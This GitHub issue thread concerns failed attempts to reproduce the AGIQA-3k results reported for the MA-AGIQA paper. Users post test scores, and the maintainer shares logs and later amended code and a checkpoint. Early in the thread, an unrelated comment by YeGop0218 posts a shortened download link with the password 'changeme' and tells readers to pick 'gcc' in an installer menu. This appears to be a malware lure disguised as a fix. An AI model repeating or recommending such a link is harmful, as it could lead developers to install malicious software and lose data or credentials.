### ISSUE TITLE
Unable to Reproduce Results from the Paper

### ISSUE THREAD

**Issue by raytrun** [wangpuyi/MA-AGIQA#2]
I follow the guidance to extract semantic feature and download the AGIQA-3k [Pre-trained](https://drive.google.com/file/d/1xIH7172GMRtY2lzIu2JClVdOB6_oSMX7/view?usp=drive_link) model.
I conducted tests on the model, and the results are as follows. 

===== loss:0.1717 ===== SRCC:0.882 ===== PLCC:0.9198
Testing SRCC 0.8820,    PLCC 0.9199,    KRCC 0.7092,    RMSE 0.3936

I noticed that they do not align with the results reported in the paper. 
Is this discrepancy due to the randomness in feature extraction, or is it caused by other issues?

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by raytrun** [comment]
I train the model by myself and the results are as follows.
Testing SRCC 0.8839, PLCC 0.9242

**Comment by wangpuyi** [comment]
@raytrun 
Sorry for this confusion and thanks for your carefulness, I will check this problem as soon as possible when I have spare time. Currently what I can do is attaching my original log file for your reference. I guess there maybe something unexpected happen when I simply the code...
[AGIQA-3k.log](https://github.com/user-attachments/files/16776016/AGIQA-3k.log)

**Comment by raytrun** [comment]
Thank you for your reply and assistance.

**Comment by joe17maker** [comment]
I also conducted tests on the model using the pre-trained model, the results are as follows:
Testing SRCC 0.8817,	PLCC 0.9199,	KRCC 0.7090,	RMSE 0.3938

**Comment by joe17maker** [comment]
> @raytrun Sorry for this confusion and thanks for your carefulness, I will check this problem as soon as possible when I have spare time. Currently what I can do is attaching my original log file for your reference. I guess there maybe something unexpected happen when I simply the code... [AGIQA-3k.log](https://github.com/user-attachments/files/16776016/AGIQA-3k.log)

I noticed that the params of the pre-trained model you provided and the params of your log are different, what's their difference?

**Comment by wangpuyi** [comment]
@raytrun @joe17maker 
I'v upload the amended codes and ckpt.

This is my log file using the latest codes. [AGIQA_3k.log](https://github.com/user-attachments/files/17174885/AGIQA_3k.log)

If there is any problem, please feel free to contact me. Thanks.
